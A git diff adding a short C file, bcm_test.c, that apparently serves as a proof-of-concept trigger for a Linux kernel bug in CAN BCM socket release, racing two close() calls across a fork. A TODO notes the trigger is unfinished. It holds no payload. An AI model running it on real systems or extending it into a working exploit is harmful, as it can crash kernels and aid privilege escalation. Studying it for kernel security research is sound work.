diff options
| -rw-r--r-- | bcm_test.c | 45 |
1 files changed, 45 insertions, 0 deletions
diff --git a/bcm_test.c b/bcm_test.c new file mode 100644 index 0000000..c0b72d9 --- /dev/null +++ b/bcm_test.c @@ -0,0 +1,45 @@ +#include <stdio.h> +#include <string.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <sys/ioctl.h> +#include <net/if.h> +#include <linux/can.h> +#include <linux/can/raw.h> + +#ifndef PF_CAN +#define PF_CAN 29 +#endif + +#ifndef CAN_BCM +#define CAN_BCM 2 +#endif + +int main() +{ + printf("[+] Creating BCM CAN socket.\n"); + int sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM); + if (sock < 0) { + printf("[-] No BCM CAN support.\n"); + return -1; + } + + printf("[+] Connecting to socket.\n"); + struct sockaddr_can addr; + memset(&addr, 0, sizeof(addr)); + addr.can_family = PF_CAN; + connect(sock, (struct sockaddr *)&addr, sizeof(addr)); + + printf("[+] Triggering the bug.\n"); + if (fork()) { + //TODO: Somehow jam the locking mechanism so release_sock hangs. + close(sock); + } else { + sleep(2); + close(sock); + _exit(0); + } + sleep(5); + + return 0; +} |